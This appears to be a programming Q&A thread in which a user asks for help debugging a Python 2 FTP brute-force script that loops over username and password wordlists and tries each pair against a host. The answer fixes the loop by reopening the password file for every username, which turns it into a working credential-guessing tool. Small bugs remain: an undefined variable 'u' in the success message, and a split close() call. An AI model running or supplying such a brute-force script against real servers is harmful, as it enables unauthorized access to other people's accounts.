# nested for loop is not working in python

Tags: python, for-loop, ftp, brute-force

hey guys i have wriiten a script for ftp brute but it is now working....every time it ignores first loop...please someone help me...

```
from ftplib import FTP
h=raw_input("Enter Host")
ftp = FTP(h)


fobj = open("passwords.txt",'r')
fob1 = open("usernames.txt",'r')


for unm in fob1:
    i= unm.rstrip()
    for pas in fobj:
        p= pas.rstrip()
        try:
            print"trying :",i,p
            ftp.login(i,p)
            print "USER AND PASSWORD FOUND",u,p
        except:
            pass
fobj.close()
fob1.close(
```

)

Comment: You need to seek to the beginning of the file to read it again.

Comment: Ya but how can i do that???

Comment: Hey guys please someone solve this

Answer (score 0):

Looks like your close() statement is in the wrong place?  Maybe just an error in indentation?

You can close the file after the inner loop (password), then reopen again as you drop back in with the new username.  That should force a reset back to the top.

```
un_file = open("usernames.txt",'r')

for unm in un_file:
    i= unm.rstrip()
    pw_file = open("passwords.txt",'r')
    for pas in pw_file:
        p= pas.rstrip()
        try:
            print"trying :",i,p
            ftp.login(i,p)
            print "USER AND PASSWORD FOUND",u,p
        except:
            pass
    pw_file.close()
un_file.close()
```